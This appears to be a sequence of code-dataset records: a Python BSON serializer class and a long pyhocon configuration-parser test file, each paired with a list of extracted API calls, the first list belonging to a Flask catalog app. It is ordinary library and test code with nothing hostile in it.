'categories', 'editedItem': 'editedItem'}), "('editcategoryitem.html', category=categoryItem.name, item=\n editedItem.name, categories=categories, editedItem=editedItem)\n", (11431, 11557), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11838, 11856), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (11846, 11856), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((12465, 12499), 'flask.flash', 'flash', (['"""Item Successfully Deleted"""'], {}), "('Item Successfully Deleted')\n", (12470, 12499), False, 'from flask import url_for, flash, make_response\n'), ((12573, 12672), 'flask.render_template', 'render_template', (['"""deletecategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('deletecategoryitem.html', category=categoryItem.name, item\n 
=itemToDelete.name)\n", (12588, 12672), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((1540, 1596), 'oauth2client.client.flow_from_clientsecrets', 'flow_from_clientsecrets', (['"""client_secrets.json"""'], {'scope': '""""""'}), "('client_secrets.json', scope='')\n", (1563, 1596), False, 'from oauth2client.client import flow_from_clientsecrets\n'), ((3465, 3480), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3478, 3480), False, 'import httplib2\n'), ((3779, 3794), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3792, 3794), False, 'import httplib2\n'), ((6029, 6051), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6036, 6051), False, 'from flask import url_for, flash, make_response\n'), ((6132, 6154), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6139, 6154), False, 'from flask import url_for, flash, make_response\n'), ((9836, 9858), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (9843, 9858), False, 'from flask import url_for, flash, make_response\n'), ((10586, 10663), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name'}), "('showCategoryItem', category=categoryItem.name, item=editedItem.name)\n", (10593, 10663), False, 'from flask import url_for, flash, make_response\n'), ((11241, 11330), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': "request.form['category']", 'item': 'editedItem.name'}), "('showCategoryItem', category=request.form['category'], item=\n editedItem.name)\n", (11248, 11330), False, 'from flask import url_for, flash, make_response\n'), ((12249, 12328), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('showCategoryItem', category=categoryItem.name, item=itemToDelete.name)\n", (12256, 12328), False, 'from flask import url_for, flash, make_response\n'), ((12524, 12546), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (12531, 12546), False, 'from flask import url_for, flash, make_response\n'), ((1844, 1899), 'json.dumps', 'json.dumps', (['"""Failed to upgrade the authorization code."""'], {}), "('Failed to upgrade the authorization code.')\n", (1854, 1899), False, 'import json\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <<EMAIL>>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
| [
"bson.dumps",
"bson.loads"
] | [((512, 535), 'bson.loads', 'bson.loads', (['b'], {}), '(b, **kwargs)\n', (522, 535), False, 'import bson\n'), ((800, 825), 'bson.dumps', 'bson.dumps', (['obj'], {}), '(obj, **kwargs)\n', (810, 825), False, 'import bson\n')] |
# -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
# b is not set so show raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
    def test_self_ref_substitution_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
assert '<NAME>' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
